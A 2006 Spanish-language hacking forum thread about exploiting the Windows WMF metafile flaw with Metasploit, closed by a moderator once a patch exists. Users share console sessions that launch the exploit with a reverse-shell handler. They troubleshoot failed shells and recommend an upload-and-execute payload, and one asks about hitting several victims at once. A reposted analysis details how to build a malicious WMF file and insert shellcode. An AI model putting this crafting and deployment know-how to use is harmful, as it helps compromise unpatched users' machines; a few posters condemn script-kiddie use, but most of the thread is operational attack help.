 Autor
|
Tema: [Patched] - Explotando WMF para Windows con MetaSploit (!¡) (Leído 13,053 veces)
|
Ertai
Ex-Staff
 Desconectado
Mensajes: 2.027
Ralph Wiggum
|
Se ha publicado un nuevo exploit en FrSIRT bastante mas avanzado y peligroso que el anterior, y también en forma de módulo para el "Metasploit Framework" la deferencia de este nuevo exploit respecto al anterior es que éste crea el código de la imagen distinto cada vez que ésta es solicitada, es decir, lo hace mucho mas dificil de detectar por los antivirus, por lo que no podemos confiarnos a nuestro antivirus. Fuente: http://www.wadalbertia.org/phpBB2/portal.phpGrán página, por cierto. Saludos.
|
|
|
|
|
En línea
|
Si la felicidad se comprara, entonces el dinero sería noble. void rotar_by_ref(int& a, int& b) {
/* Quien dijo que no se podia sin una variable temporal? */
*a = *a ^ *b;
*b = *a ^ *b;
*a = *a ^ *b;
}
|
|
|
cubicax
Desconectado
Mensajes: 2
|
no creo que el problema sea ese, creo que ando haciendo algo erroneo osea porque el exploit esta bien, l oe hecho de esta manera pero igual sigue quedandoseme en esa parte joer.. msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 20x.22x.18x.x LHOST -> 20x.22x.18x.x msf ie_xp_pfv_metafile(win32_reverse) > exploit - Starting Reverse Handler.
- Waiting for connections to http://0.0.0.0:8080/anything.wmf
- HTTP Client connected from 217.216.54.49:4711 using Windows XP, sending payload...
sigo leyendo haber si es que hago caso omiso a algo pero creo que esta todo bien =S... Salu2. |
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
<POSTS EN INGLES PROHIBIDOS> VUGO, este es un foro es Español  usa un traductor antes de postear. |
|
|
|
« Última modificación: 4 Enero 2006, 17:41 por Sirdarckcat »
|
En línea
|
|
|
|
skilled
Desconectado
Mensajes: 138
skilled sVr
|
cubicax skilled, creo que el problema radica que al configurar el HTTPHOST se escucha en la direccion directa sin el 'anything.wmf' así que si pasas algo como http://tuip:8080/anything.wmf' no va a ir intenta pasarla diorecta la ip y el puerto a ver si te va este no era el problem porque ponia ip:puerto directamente... Saven lo que puede passar? |
|
|
|
|
En línea
|
Skilled --> Learn + Learn = Surpassing Surpassing = Rejoicing |
|
|
korven
Desconectado
Mensajes: 3
|
Vaya... interesante. ¿Alguien ha probado a atacar un Athlon 64?... si no, probadlo y voilà! salta la protección de ejecución de datos y no funciona. Imagino que en los Pentiums relativamente nuevos lo llevan también. ¿alguien puede confirmarlo?.
|
|
|
|
|
En línea
|
|
|
|
VUGO
Desconectado
Mensajes: 6
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Used with permission by san[at]xfocus.org:
------------------------------------------
The recent wmf vul is really fun, I found some interest things after
analysed it. I attached a very simple wmf file(64 bytes) which can crash
your explorer. You can simply change those 0xcc to your shellcode.
An attach wmf file constructs with a 18 bytes metafile header which
defined as following:
typedef struct _WindowsMetaHeader
{
WORD FileType; /* Type of metafile (0=memory, 1=disk) */
WORD HeaderSize; /* Size of header in WORDS (always 9) */
WORD Version; /* Version of Microsoft Windows used */
DWORD FileSize; /* Total size of the metafile in WORDs */
WORD NumOfObjects; /* Number of objects in the file */
DWORD MaxRecordSize; /* The size of largest record in WORDs */
WORD NumOfParams; /* Not Used (always 0) */
} WMFHEAD;
and two data records which defined as following:
typedef struct _StandardMetaRecord
{
DWORD Size; /* Total size of the record in WORDs */
WORD Function; /* Function number (defined in WINDOWS.H) */
WORD Parameters[]; /* Parameter values passed to function */
} WMFRECORD;
Somethings that we need to attention:
1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide 2;
2. the attack file is larger than 64 bytes;
3. the last record always has a function number of 0000h, a Size of
00000003h, and no Parameters array;
4. the attack record has a function number of 0626h, which defined in
wingdi.h. 26h is important, it will flow to Escape function. I found
it will lead to SetAbortProc only the Parameters[0] is 0009h.
.text:77C4B65C loc_77C4B65C: ; CODE XREF: PlayMetaFileRecord+43#j
.text:77C4B65C ; DATA XREF: .text:off_77C769FE#o
.text:77C4B65C push [ebp+uFlags] ; case 0x26
.text:77C4B65F push ebx
.text:77C4B660 call sub_77C4B68A
.text:77C4B665 cmp eax, edi
.text:77C4B667 mov [ebp+var_4], eax
.text:77C4B66A jnz loc_77C4B424
.text:77C4B670 mov ax, [ebx+6]
.text:77C4B674 cmp ax, 0Fh
.text:77C4B678 jnz loc_77C5FC0A ; flow to Escape
...
.text:77C61062 loc_77C61062: ; CODE XREF: Escape+ECB7#j
.text:77C61062 sub edi, 6
.text:77C61065 jz short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h
...
.text:77C543E7 loc_77C543E7: ; CODE XREF: SetAbortProc+54#j
.text:77C543E7 ; SetAbortProc+10720#j
.text:77C543E7 xor eax, eax
.text:77C543E9 mov [esi+14h], edi ; write callback pointer?
...
.text:77C604C8 owned: ; CODE XREF: sub_77C4B09C+1E4#j
.text:77C604C8 mov eax, [eax+14h] ; the pointer
.text:77C604CB cmp eax, ecx
.text:77C604CD jz loc_77C4B286
.text:77C604D3 push ecx
.text:77C604D4 push edi
.text:77C604D5 call eax ; got it
Best Regards
--
san <san[at]xfocus.org>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
« Última modificación: 4 Enero 2006, 17:48 por Sirdarckcat »
|
En línea
|
|
|
|
|
|
sulrun
Desconectado
Mensajes: 33
|
Lo del amd64 es cierto pero no siempre pasa, probando en mi equipo cuando es wmf siempre salta pero si lo renombro a jpg ya no salta lo de la proteccion, aveces con un jpg tb em a saltao y le cambio el nombre y ya no salta.Cosas mas raras...
Y lo de que el exploit no funciona pues ami no me da una shell me sale el mismo problema que a los demas pero si me funciona lo de enviar un archivo y que se ejecute con el PAYLOAD win32_reverse_stg_upexec
|
|
|
|
« Última modificación: 3 Enero 2006, 19:50 por sulrun »
|
En línea
|
|
|
|
antraXactive
Desconectado
Mensajes: 395
pkg_delete sgae
|
 ¿POR QUE NADIE DICE LA VERDAD? EN WINDOWS XP, NO FUNCIONA EL NUEVO EXPLOIT, (1.5 y 1.6)  ¿¿Como hacen los spywares para meter un downloader en la imagen sin conseguir esa primitivas shells?? Alguien que tire algun dato... Los exploits si funcionan, y las páginas lo que hacen es simplemente no usar el payload de reverse shell, si no el Staged Reverse Upload and execute, o algo así, que sube un archivo a la máquina remota y lo ejecuta. PD: No sean lamers y no usen el metasploit para putadas, como sospecho que hacen muchos...
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.946
Lavando Platos
|
Mousehack, no borre nada.. lo movi a su lugar correcto, si vamos a poner un Tema nuevo para discutir lo mismo que otro 2 lugares arriba, estaria todo muy desorganizado..
Saludos!!
y VUGO, no se admiten Posts en ingles lee las reglas del foro.. si quieres decir algo traducelo al español
|
|
|
|
|
En línea
|
|
|
|
|
parisnet
|
No funciona el Exploit 1.5 y 1.6, si no no tuviese que haberlo reemplazado por el 1.2
Ese es mi caso por lo menos.
win32_reverse_stg_upexec <--- Este es masivo? o sea puede estar explotando mas de una victima a la vez?
|
|
|
|
|
En línea
|
|
|
|
|
Man-In-the-Middle
|
XD!!, esto ya fueeee, esta recontra demostrado, que los AVs lo detectan, en su mayoria, por mas que los codigos sean al azar
Yo me preocuparia de otro BUG!!!, que esta bien bonito y es mas tiene el exploit, bien hecho, ya os contare
|
|
|
|
|
En línea
|
|
|
|
skilled
Desconectado
Mensajes: 138
skilled sVr
|
Haber, repito Alguien save a que es devido esto?  Asi se keda asta que me canso i cierro... he provado todo lo que he podido.. A que es devido  |
|
|
|
|
En línea
|
Skilled --> Learn + Learn = Surpassing Surpassing = Rejoicing |
|
|
/* strcpy() */
Desconectado
Mensajes: 367
FLEMA - The Ramones - Sex Pistols
|
Y para que ***** ponen los exploits ¿?
Por que no analizan la vuln, tomando las partes que son vulnerables y analizandolas ¿?
Veo que esto se esta llenando de kiddies, defacers y demas calaña.
Creo que el sub se esta llendo al carajo, y que hay que corregirlo.
Recomendacion de mi parte: No hay que poner exploits, si no que se deben poner PoC's y analizar la vulnerabilidad
|
|
|
|
|
En línea
|
Sigo asi
Soy feliz
yo elegí
Sexo, Drogas y PunkRock
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.946
Lavando Platos
|
Haber, repito Alguien save a que es devido esto? Asi se keda asta que me canso i cierro... he provado todo lo que he podido.. A que es devido diosmio almenos tomate la molestia de buscar antes de postear.. Y para que ***** ponen los exploits ¿?
Por que no analizan la vuln, tomando las partes que son vulnerables y analizandolas ¿?
Veo que esto se esta llenando de kiddies, defacers y demas calaña.
Creo que el sub se esta llendo al carajo, y que hay que corregirlo.
Recomendacion de mi parte: No hay que poner exploits, si no que se deben poner PoC's y analizar la vulnerabilidad
--este bug ya tiene parche de microsoft-- ---y como nunca se analizo el bug en si sino que solo es una discucion de como arreglar el mentado exploit.. tema cerrado, si alguien tiene ganas de aprender y analizar realmente.. creen un nuevo post---
|
|
|
|
|
En línea
|
|
|
|
|
 |
